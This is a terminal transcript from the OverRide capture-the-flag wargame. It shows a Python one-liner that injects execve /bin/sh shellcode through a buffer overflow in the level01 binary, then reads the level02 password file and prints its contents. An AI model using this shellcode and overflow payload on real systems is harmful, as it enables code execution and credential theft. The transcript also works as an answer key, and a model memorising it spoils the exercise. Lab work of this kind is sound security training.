level01@OverRide:~$ ls
level01
level01@OverRide:~$ (python -c '''
user = "dat_wil"
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
padding = "X" * (256 - len(user + shellcode) + 79)
print user + shellcode + padding + "\x47\xa0\x04\x08"
'''; echo "cat /home/users/level02/.pass") | ./level01
** ADMIN LOGIN PROMPT **
Enter Username: verifying username....

Enter Password: 
nope, incorrect password...

PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
level01@OverRide:~$ 